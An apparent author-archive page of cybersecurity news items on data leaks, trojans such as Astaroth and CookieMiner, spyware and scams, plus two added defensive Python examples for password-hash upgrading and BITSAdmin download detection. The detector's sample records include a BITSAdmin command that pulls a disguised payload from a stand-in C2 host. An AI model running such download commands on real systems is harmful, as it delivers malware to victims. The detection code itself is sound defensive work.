Author Archives: Toshavi Newaskar

Massive HIV Data Leak: Thousands of Detailed Records Compromised.












In a recent major data leak in Singapore, the records of thousands of HIV-positive people were compromised.


One of the victims of this leak was informed via a phone call that her record was out in the open along with those of approximately 14,000 others.

This enormous leak came as a real shock, as many of those affected were reluctant to let their status become public.

The main target which has emerged in this database leakage incident is the Singaporean media.

The government said that a local doctor who had an American partner, who had access to all the records in question, is the main person who’s at fault.

Reportedly, according to the authorities, the leak has been contained, but extreme emotional damage has been caused to those infected with HIV.

In Singapore, as mandated by the law, the aforementioned victim’s HIV status was added to the national database.

The HIV registry was set up in 1985 by the Ministry of Health to keep a check on the infection and the status of potential cases.

This is the database that was compromised, along with the names and addresses of more than 14,000 people.

According to sources, the American partner has been named as Mikhy Farrera-Brochez. The data and the access to the registry had been wrested from his Singaporean doctor partner.

Mikhy couldn’t work in Singapore, as Singaporean law states. He was convicted of fraud because he used someone else’s blood to pass a mandatory HIV test.

According to Mikhy there is more to the story of the leakage and it’s not just him who’s behind it all. He also said that he had contracted HIV in prison and that he was denied medication.

He also accused Singapore of using the HIV database to keep track of gay men in the country, because same-sex sex is illegal there.

The Singaporean authorities have denied this accusation, stating that it is absolutely untrue.

Singapore’s health minister is working with the authorities of the US regarding the case.
Earlier there was a total ban on people with HIV entering the borders of Singapore, which got lifted in 2015.

But the people who have married Singaporean citizens or have permanent residencies in the country could dodge it.

This leak has come as a shock and has been emotionally degrading. The chaos has made citizens question how securely records are kept.

One of the senior doctors who have been working on safeguarding the interests of the HIV patients in Singapore said that many implementations exist which restrict the doctors from accessing such records.

This incident has wreaked a lot of emotional havoc on people who are infected and whose names are in those compromised records.

The victims aren’t even sure whether the leak has actually been contained or not.

This leaked information could ruin a lot of lives and careers for the infected.

The victims are seriously concerned about the spread of the detailed information and the compromised records.


Artificial Intelligence To Aid Scientists Understand Earth Better






According to a recent study, computer science is all set to collaborate with geography. With the help of Artificial Intelligence, complex processes of the planet Earth could now be understood better.

The Friedrich Schiller University’s researchers got behind the books to carry out the aforementioned study, wherein it’s clear that the AI has a lot to contribute to life science.

Climatic conditions and the study of the Earth systems would now become substantially easy to comprehend.

This ability to understand things better would contribute to improving the already existing systems and models on the Earth’s surface.

Before AI got involved, the investigations done regarding the Earth were merely about static elements including the soil properties from a global scale.

More high-tech techniques will now be employed to handle the processes better, all thanks to Artificial Intelligence.

Variations in largely global land processes like photosynthesis could also be now monitored and all the considerations could be deliberated beforehand.


The Earth system data along with a myriad of sensors is now available so that tracking and comprehending the 'Earthian' processes by the aid of AI would now be an easy job.

This new collaboration is a very promising element, as processes that are beyond human understanding could now be estimated.

Image recognition, natural language processing and classical machine learning applications are all encompassed within the new techniques available.

Hurricanes, fire spreads and other complex processes leveraged by local conditions are some of the examples for the application.

Soil movement, vegetation dynamics, ocean transport and other basic themes regarding the Earth’s science and systems also lie within the category of the application.

Data-dependent statistical techniques, no matter how good the data quality, are not always certifiable and are hence susceptible to exploitation.

Hence, machine learning needs to be an essential part, which would also solve the issue regarding storage capacity and data processing.




Physical and mechanical techniques if brought together would absolutely make a huge difference. It would then be possible to model the motion of ocean’s water and to predict the temperature of the sea surface.

According to what one of the researchers behind the study cited, the major motive is bringing together the “best of both worlds”.

In light of this study, warnings regarding natural calamities or any other extreme events, including climatic and weather possibilities, would become far easier than ever before.

Websites Including Ixigo Hacked, Leaving 127 Million Accounts Exposed For Sale






Over 127 million accounts were broken into from around 8 separate websites. This is the doing of a hacker who’d stolen records of 620 million people before.

The travel booking site “Ixigo” seems to be one of the major victims from which records were stolen.

Allegedly, these infamous records include the users’ names, email addresses, passwords and other personal details.

According to research, 18 million user records were wrested from Ixigo and around 40 million were stolen from YouNow, which is a live-video streaming site.

1.8 million accounts were wrested from Ge.tt and 57 million records were snatched off from Houzz.

The hacker’s listings showed that an antiquated “MD5” hashing algorithm was applied to “scramble” passwords, which are otherwise easy to “unscramble”.

The hacker themselves claimed to have user records from mainstream sites like MyFitnessPal and Animoto, declaring the number of records to be 151 million and 25 million respectively.

The databases, which make life easier for hackers, can now be had in exchange for $20,000 in Bitcoin from the Dream Market cyber-souk in the Tor network.

The price is pretty hacker-pocket friendly. The major target audience for the deal seems to be spammers and credential stuffers.
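For site operators still holding unsalted MD5 password records like those described above, the following added example (not code from any of the affected sites) shows one way to verify a legacy record at login and replace it with a salted PBKDF2-HMAC-SHA256 record. The record format, function names and iteration count are assumptions made for the illustration.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Assumed work factor for PBKDF2-HMAC-SHA256; tune it to your own hardware.
PBKDF2_ITERATIONS = 600_000
SCHEME = "pbkdf2_sha256"


def legacy_md5(password: str) -> str:
    """Unsalted MD5 as described in the listings; kept only to read old records."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>'."""
    salt = salt if salt is not None else os.urandom(16)  # fresh random salt per user
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS
    )
    return f"{SCHEME}${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(stored: str, password: str) -> bool:
    """Recompute the digest with the stored salt and compare in constant time."""
    try:
        scheme, iterations, salt_hex, digest_hex = stored.split("$")
        rounds = int(iterations)
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
    except ValueError:
        return False  # malformed record
    if scheme != SCHEME or rounds < 1:
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(actual, expected)


def is_legacy_md5(stored: str) -> bool:
    """A bare 32-character hex string is treated as an old unsalted MD5 record."""
    return len(stored) == 32 and all(c in "0123456789abcdef" for c in stored.lower())


def verify_and_upgrade(stored: str, password: str) -> Tuple[bool, str]:
    """Check a login attempt; return (ok, record that should now be stored).

    A correct login against a legacy MD5 record yields a new salted record,
    so the weak hash is replaced the first time the user signs in.
    """
    if is_legacy_md5(stored):
        ok = hmac.compare_digest(legacy_md5(password), stored.lower())
        return ok, (hash_password(password) if ok else stored)
    return verify_password(stored, password), stored


if __name__ == "__main__":
    # Constructed sample: two users who chose the same password.
    old_a, old_b = legacy_md5("hunter2"), legacy_md5("hunter2")
    print("MD5 records identical:", old_a == old_b)
    ok, new_a = verify_and_upgrade(old_a, "hunter2")
    ok, new_b = verify_and_upgrade(old_b, "hunter2")
    print("upgraded records identical:", new_a == new_b)
```

Because every upgraded record carries its own salt, two users with the same password no longer share a hash, which is what makes one precomputed table useless against the whole database.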

These credentials could further be used to hack into other sites and wrest other user details.

The victimized websites have started alerting their users about the hazard and it would only be fit for the users to stay vigilant about it all.

Astaroth: The Trojan That Abuses Anti-Virus Software To Steal Data




A new Trojan has surfaced which disguises itself as GIF and image files and tries to exploit the anti-virus software to harvest the data on the user’s PC.

A security research team brought to everyone’s notice that this variant supposedly makes use of modules in cyber-security software.

The exploitation of the modules leads to the cyber-con getting hold of the victim’s data, including online credentials.

The Trojan, in the guise of an extension-less file, tries to move around the victim’s PC undetected.

By the use of spam emails and phishing messages, the victim is lured into downloading the malicious file, and then the actual Microsoft Windows BITSAdmin tool is used to download the full payload from a command-and-control (C2) server.

The malware then launches an XSL script and finalizes a channel with the C2 server. The script is obfuscated and contains functions to shroud itself from the anti-virus software.

The same script is responsible for the process which influences BITSAdmin to download payloads which include Astaroth from a different C2 server.
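The BITSAdmin download step described above leaves a process-creation record that defenders can look for. This added example (not taken from the research the article summarizes) scans constructed process records for bitsadmin downloads from a remote URL and raises the severity when the file is extension-less or named as an image, as the article describes; the record field names and the example.invalid hosts are assumptions.

```python
import ntpath
import posixpath
import re
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

IMAGE_EXTS = {".gif", ".jpg", ".jpeg", ".png", ".bmp"}
DOWNLOAD_SWITCHES = {"/transfer", "/addfile"}  # bitsadmin switches that name a remote file

# Constructed process-creation records (not real telemetry); field names are assumed.
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer job1 /download /priority foreground "
                     r"http://c2.example.invalid/a.gif C:\Users\Public\Libraries\tmp\a"},
    {"host": "it-07", "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": r"bitsadmin /transfer wsusjob /download /priority normal "
                     r'https://updates.example.invalid/tool-setup.msi "C:\IT\cache\tool-setup.msi"'},
    {"host": "ws-02", "image": r"C:\Windows\System32\bitsadmin.exe",
     "command_line": "bitsadmin /list /allusers"},
    {"host": "ws-03", "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\notes\bitsadmin-howto.txt"},
]


@dataclass
class Finding:
    host: str
    url: str
    destination: Optional[str]
    severity: str
    reasons: List[str]


def tokenize(command_line: str) -> List[str]:
    """Split on whitespace, keeping double-quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command_line)]


def analyze(event: dict) -> Optional[Finding]:
    """Return a Finding for a bitsadmin download from a remote URL, else None."""
    if ntpath.basename(event["image"]).lower() != "bitsadmin.exe":
        return None
    tokens = tokenize(event["command_line"])
    if not DOWNLOAD_SWITCHES & {t.lower() for t in tokens}:
        return None  # listing or managing jobs, not fetching a file
    url_idx = next((i for i, t in enumerate(tokens)
                    if t.lower().startswith(("http://", "https://"))), None)
    if url_idx is None:
        return None
    url = tokens[url_idx]
    # In both switches the local file name follows the remote URL.
    dest = tokens[url_idx + 1] if url_idx + 1 < len(tokens) else None

    reasons = ["bitsadmin download from remote URL"]
    if posixpath.splitext(urlparse(url).path)[1].lower() in IMAGE_EXTS:
        reasons.append("remote object named as an image")
    if dest is not None:
        ext = ntpath.splitext(dest)[1].lower()
        if ext == "":
            reasons.append("destination file has no extension")
        elif ext in IMAGE_EXTS:
            reasons.append("destination file uses an image extension")
    severity = "high" if len(reasons) > 1 else "medium"
    return Finding(event["host"], url, dest, severity, reasons)


def scan(events: List[dict]) -> List[Finding]:
    """Run analyze() over all records and keep the hits, in input order."""
    return [f for f in (analyze(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding.severity, finding.host, finding.url, "; ".join(finding.reasons))
```

Legitimate administrative use of BITSAdmin exists, so the medium-severity hits are candidates for an allow-list of known job sources rather than alerts on their own.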

The old version of this Trojan used to launch a scan to look for the anti-virus programs, and in case of the presence of “Avast”, the malware used to quit.



But as it turns out with Astaroth, the antivirus software would now be abused and a malicious module would be injected into one of its processes.

This kind of exploitation relies on what are called LOLbins, Living Off the Land binaries. GAS, an anti-fraud security program, could be abused in the same way.

This Trojan first surfaced in the year 2017 in South America. It targets machines, passwords and other data. Astaroth is also capable of keylogging and could intercept calls and terminate processes.

The malware employs a “fromCharCode() deobfuscation” method to conceal code execution, which is an upgrade on older versions of Astaroth.

LOLbins seem to have a lot of malicious potential including stealing credentials and personal data. This method is highly attractive to cyber-cons and hence needs to be prepared against.

Android Spyware "Triout" Back With Spying Abilities And New Malicious Schemes






An Android malware in the guise of an online privacy app is all set to cause a lot of harm, as it has resurfaced as a more malicious version of itself and has acquired spying abilities.

The application tries to trick the users into downloading and then starts working its method.

Triout, the application, is created to help users dodge censorship on the internet.

The campaign had been active since May last year, under the guise of an adult application.

August, 2018 is when the spyware was discovered, because of the massive amounts of information it was harvesting, including photos, text conversations, and phone conversations.

Collecting GPS information about the victims and making the user’s location vulnerable are two of the other ill effects.


With changed tactics and more malicious effects, the malware is being distributed under the cloak of a stolen but legitimate privacy tool from the Google Play Store.

Psiphon is the privacy tool behind whose fake version Triout is hiding. This application is widely used and has been downloaded around a million times.

Third-party sites also provide this app on their platforms, in case hackers don’t seem to have access to Google’s Play Store.

The fake version of Psiphon works in exactly the same way as the real version of it. The looks and the interface have all been cleverly matched.



A particular set of victims is being targeted via Triout so that it doesn’t raise much suspicion.

When the malware was discovered it was found to be targeting users from Germany and South Korea.

Spear-phishing is another concept that is reportedly being employed by the cyber-cons to ensure that the users download their malicious app.

The way victims are lured in and the command and control of Triout have been cunningly altered to increase the success rate.


Reportedly, the updated versions of Triout are being uploaded from various distinct locations around the world, a few being Russia, France and the US.

The origin of the campaign and the cyber-cons behind it are still behind the curtain and this is what makes Triout more malicious.

According to the leading security researchers, this application possesses super spying powers and is deliberately fabricated to perform activities like espionage.

The researchers implore users to download applications only from official sites, to steer clear of any suspicious-looking applications and to refrain from downloading them.

Thousands Of Users Thrashed By Extremely Real-looking-Fake-Scans Scam



Thousands of users have encountered a severe threat from scammers who are employing cunning use of JavaScript and HTML codes by way of “Potentially Unwanted Applications”.

A major security researching organization uncovered a recent development in the scamming area where PUAs and POAs are being employed.

These scams could be categorized as tech-support scams which primarily work on scaring the victim into doing something unforeseen by the victim themselves.

After fake-calls, potentially unwanted applications have become quite common, but the latest twist is the shrewd usage of JavaScript and HTML code.

This code specifically works on making the fake scans seem convincingly real, making it faster and easier for the scammers to fool their prey.

The well-known Norton Security applications are basically being stolen from the aforementioned organization.

These scams are in no way comparable to the basic and obvious anti-virus scams that are run on a common basis.

The scammers make the scan look so legit that it never occurs to the victim to question it at all.

There sure is an alert which pops up. The users think it is one from an anti-malware app, when it’s actually coming from a web browser.

The way the scammers go about it is that they offer an infection to be paired up by way of a 10-second scan. This obviously lures the users in swiftly.

A web-based dashboard is being implemented by the scammers to manage and monitor all the scams that are happening.

Thousands of dollars have been wrested from the victims that too by using overtly basic, fake looking contrivances.

The last three months of 2018 were really busy for Symantec, the aforementioned organization, as they blocked PUA installations around 89 million times.

There are several points that have to be kept in mind; for instance, no pop-up is capable of analyzing the hard drive and the real files on it.

No anti-malware application would ask the user to download a separate application for the update process.

The best way to get saved from this kind of threat is looking out for an alert that mentions the remaining days left in the so called “subscription”.

CookieMiner: Steals Passwords From Cookies, Chrome And iPhone Texts!



There’s a new malware, CookieMiner, prevalent in the market, which binges on saved passwords on Chrome, iPhone text messages and Mac-tethered iTunes backups.

A world-wide cyber-security organization recently uncovered a piece of malware which gorges on saved user credentials like passwords and usernames.

This activity has been majorly victimizing passwords saved onto Google Chrome, credit card credentials saved onto Chrome and iPhone text messages backed up to Mac.

Reportedly, what the malware does is that it gets hold of the browser cookies in relation with mainstream crypto-currency exchanges which also include wallet providing websites the user has gone through.

The surmised motive behind the past acts of the miner seems to be the excruciating need to bypass the multi-factor authentication for the sites in question.

Having dodged the main security procedure, the cyber-con behind the attack would be absolutely free to access the victim’s exchange account or the wallet so being used and to exploit the funds in them.

Web cookies are those pieces of information which get automatically stored onto the web server, the moment a user signs in.

Hence, exploitation of those cookies directly means exploiting the very user indirectly.

Cookie theft is the easiest way to dodge login anomaly detection: if the username and password are used by an amateur, the alarms might go off and another authentication request may be sent.

Whereas if the username and password are used along with the cookie, the entire session would be considered legitimate and no alert would be issued at all.

Most of the fancy wallet and crypto-currency exchange websites have multi-factor authentication.

All that the CookieMiner does is that it tries to create combinations and try them in order to slide past the authentication process.

A cyber-con could treat such a vulnerable opportunity like a gold mine and could win a lot out of it.

In addition to Google’s Chrome, Apple’s Safari is also a web browser being openly targeted. As it turns out, the choice for the web browser target depends upon its recognition.

The malware seems to have additional malignancy to it, as it also finds a way to download a “CoinMiner” onto the affected system/device.

Google’s Research App- ‘Screenwise Meter’ To Encroach Apple’s Policies?



Apparently, a research application was being run by Google, which could potentially violate Apple’s policies, the same way Facebook once did.

“Screenwise Meter” is the name of the infamous application in question.

It’s an invitation-only program which collects and monitors data on phones and in return guarantees gift cards.

The application uses an “Enterprise Certificate”, named “Sideload” which was revoked from Facebook.

Due to this revocation, a lot of havoc was wreaked within the ‘employee-only’ apps of Facebook on iPhones.

After what happened with Facebook, there were likewise chances of Google’s certificate being revoked by Apple too.

But before that could happen, Google shut its ‘Screenwise Meter’ down and apologized for putting the application into Apple’s Enterprise Program in the first place.

The application was always meant to be voluntary, cited one of the spokespersons of Google, and also that it has now been entirely disabled on all the iOS devices.

Altran Technologies, France; Smacked By A Cyber-Attack!




Reportedly, the France based Altran Technologies fell prey to a cyber-attack which attempted to smack down its operations in some of the European nations.



Last Thursday, a cyber-attack took the French engineering consultancy, Altran Technologies by storm.



This led to the organization closing down its IT network and applications.



The firm instantly started working on a resurgence plan, making sure that it didn’t undergo much damage.



A large scale “Domain Name System” hijacking campaign is already being investigated and is subject to a lot of questioning.



This campaign is said to have wreaked havoc among a lot of government as well as commercial organizations all across the world, according to Britain’s National Cyber Security Centre.

The Return Of Trojan Poses Substantial Hacking Threat To Businesses!




The Trojan malware has returned with its infectious ransomware attacks with an aim to harvest banking credentials and personal and property related data.




Business organizations have become the latest targets of this malware.



With long-term and insidious operations as ambition, the Trojan poses a lot of threat even to intellectual property.



In a new report from one of the reputed security companies, it was mentioned that backdoor attacks against businesses, with Trojans powering them, have subsequently increased.



According to the aforementioned security lab, “Trojans” and “Backdoors” are different.



A Trojan is supposed to perform one function but ends up performing another and a Backdoor is a type of Trojan which enables a threat actor to access a system via bypassing security.



“Spyware” attacks have also consequently risen. Spyware is malware which helps gather information on a device and send it to a third party, stealthily.



This concept, of a spyware, sure is old but still is as efficacious as any other powerful malware and strictly works towards data exfiltration.



The “Emotet Trojan” has been considered to be behind the information-stealing campaigns all through last year and in the beginning of this month too.



This Trojan could move through networks, harvest data, and monitor networks. Also, it could easily infect systems by reproducing with no substantial effort at all.



Emotet is a self-sufficient danger which tends to spread onto compromised systems in addition to installing other malware on them.

The menacing behavior of TrickBot was also touched upon in the aforementioned report, as it’s one of the by-products of Emotet.



The constantly evolving TrickBot daily gets updated with new abilities, stealing passwords and browser histories and harvesting sensitive data being a few of them.



Consultancy firms seem to be the primary targets of the Trojan. It is disposed towards harvesting more than just banking details and personal information.



Intellectual property is another thing which is a major point of concern for everyone now that the cyber-cons have stooped down to breaching walls using Trojans.



These tactics were thought to be really boring and old but have taken serious twists and turns and have evolved into something genuinely perilous.



Businesses should stop under-estimating the attacks and keep a keen eye towards any potentiality of such attacks.

China Launches An App Which Works Like A Debtor Radar!






















Giving apps an absolutely new dimension, China recently launched an app which works like a radar for people who are in debt.


Reportedly this application was developed on the instructions of the Chinese police. The app was created in the Chinese province of Hebei.



The application tends to display the locations of people in debt, whenever the person using the app is within 500 yards of them.



The major inspiration behind the application is the need to report the citizens who spend more than they should.



The application, which goes by the name of “Map of Deadbeat Debtors”, could be accessed via ‘WeChat’ (a social media app).



It's being claimed that the users are instantly alerted via a flash when they stand within 500 meters of a debtor.



The exact location of the debtor is displayed; whether any personal information appears hasn't been confirmed yet.


It's an initiative which works towards citizens keeping a lookout for potential debtors, regardless of the seriousness of the debt.


  
Apparently, owing a debt is considered inappropriate in the culturally rich country of China.



The new reforms in the social credit system of the country are to be held responsible for the idea of the application.




The latest system is just the thing which the country needs and will judge the citizens on the basis of their social behavior.

Over 200 Million Chinese CVs Compromised On The Dark Web









Recently, a database comprising over 200 million Chinese CVs was discovered online in a compromised position, where it was laid bare for the dark web to devour. Naturally, it spilled explicitly detailed information.



Lacking fundamentally basic security measures, the database exposed some really personal data of people.



The database encompassed their names, addresses, mobile phone numbers, email addresses, education details and more.



The highly detailed information in the database was compiled by persistently scouring various Chinese job sites.



Reportedly, the director of the researching institution cited on the issue that at the outset, the data was thought to be gained from a huge classified advert site, namely, BJ.58.com.



Nevertheless, BJ.58.com, vehemently denied the citation and their relation with this accident.



They had thoroughly analysed and checked their databases and found nothing questionable, hence reassuring that they had no role to play in the data leakage.



They also mentioned that certainly some third-party CV website “Scraper” is to blame.



It was via Twitter that the news about this data cache first floated among people, and soon after that, it was removed from the Amazon cloud where it had been stored.



But, as it turned out while further analyzing, before it was deleted it had previously been copied around 12 times.



There has been a series of incidents where the Chinese have been cyber-affected, and this data loss is the latest of all.



From online rail bookings to allegedly stealing rail travelers’ personal data, the early days of January were quite bad for the Beijing people.



Reportedly, in August last year, the police of China were busy investigating a data breach of hotel records of over 500 million customers.



Personal data, including the booking details and accounts, registration details and other similar information were leaked.



Also, the Internet Society of China had released a report wherein the several phishing attacks and data breaches the country’s residents had faced were mentioned.

Bitcoin Ransom Of $950,000 Paid To Kidnappers For An American Man Who’s Still Missing!









A Bitcoin ransom of $950,000 was demanded by the kidnappers in exchange for a United States businessman. Despite the ransom having been paid, the abducted man is still missing.


The missing man, who was the owner of an online gambling platform, has been identified as William Sean Creighton Kopko.



The man had gone missing in Costa Rica, where he was reportedly taken unawares last September.



Around 12 people were arrested by the Spanish and Costa Rican police in relation to the aforementioned kidnapping.



The family of Kopko had to pay the demanded ransom of bitcoin worth $950K, after which the kidnappers cut off communication.



The suspected kidnappers suddenly absconded to Cuba and returned to Spain in early November of 2018.



These suspects then rented an apartment and that’s when they got arrested in Zaragoza, Spain.



Tech savvy criminals have always been keen on crypto-currency and hence the harvesting of bitcoin has always been a thing.



Also, some time earlier, criminals posing as students willing to learn about bitcoin tortured a man into revealing his passwords to crypto-currency accounts.



There have been recent cases wherein, in exchange for kidnapped wives and other important entities, crypto-currency has been asked for.



Apparently, demanding bitcoins as ransom has become the latest thing.



Over 30 Thousand Patient Records Exposed; Third-Party Breach To Blame




Cyber-cons recently targeted another health organization. ‘Managed Health Services of Indiana Health Plan’ recently went public about a third-party data breach that exposed the personal details of 31,000 patients.


This breach was the result of one of the two security incidents that the institution had to face.



There are two major healthcare programs, namely ‘Indiana’s Hoosier Healthwise’ and ‘Hoosier Care Connect Medicaid’, which this organization runs.


The MHS was informed about the breach by one of its vendors. The information was regarding someone having illegitimately gained access to their employees’ email accounts.


Disconcertingly, according to the reports, the unauthorized access had occurred between the months of July and September last year.


During the investigation initiated by the MHS, it was found out that patients’ personal data including their names, insurance ID numbers, dates of birth, dates of services provided and their addresses were all potentially out in the open.


As the investigation unfolded, it was discovered that the incident was caused due to a phishing attack on the vendor’s system.


Rapid steps were taken by the vendor to counter the attack by the aid of a computer forensic company.


Some of the information in the affected email accounts was laid out pretty bare to be accessed. The “hacked” email accounts were the main source of information.


The easiest trick for harvesting personal data is performing a phishing attack. A phishing attack anywhere in the entire chain could affect all the people involved.


As a result of the overall effect on the chain, 31,000 people were affected and had their data exposed.


Reportedly, this has been the 4th in the list of attacks made on health plans, and that in the last month alone.


It becomes evident after such an attack that the health-care industry badly needs better management and cyber-security systems.

Google Assistant Is All Stacked Up With Loads Of New Features




Google Assistant is all set to move forward, providing its users with eagerly awaited fresh features and integrations.

Some of these features have been on the demand list of Google Assistant’s users. Let’s check out what the fresh integrations and features are.

Interpreter Mode
Helping users to have a conversation in different languages is what Google home devices are all up for. The ‘Interpreter Mode’ will help translate in real-time and will narrate the entire translation out loud; in case of smart displays the text will also be shown on-screen.
Command: “Hey Google, be my Spanish interpreter”

Google Assistant Connect
This is an economic means and a manifesto for manufacturers so that they could add Google Assistant into their products. It is easily expandable to new devices by way of existing smart home platforms.
An e-link is provided which helps to display calendar and weather. The information is delivered via a smart speaker within the house (already existing).

This program could be accessed by the manufacturers in late 2019.

Google Maps Integration
At last, Google Maps and Google Assistant are shaking hands. Users will now soon be able to convey their Map data such as their ETA to their friends.
Similarly, replying to text messages, adding new destinations, searching for new places on the route and so much more.
Google notes will also be synchronized with Google Assistant.

Flight Check-Ins
The most awaited feature is the flight check-in; via this inclusion, Google Assistant would help the users to easily check into their flights and access boarding passes.
Also the Assistant will send notifications regarding check-ins and other related stuff.
Command: “Hey Google, check into my flight.”

Newly Announced Devices
Google has made some really interesting announcements regarding the latest devices it’s about to launch pretty soon.
Brands like JBL, Anker, Whirlpool, and Verizon are employing Google Assistant in one way or another.
Sonos will also have Assistant pretty soon, especially Sonos Beam and Sonos One. The older models will have the Assistant via an update.
Smart displays, watches, cars and audio devices are a few on the list of devices which will have in a few weeks the Assistant’s assistance.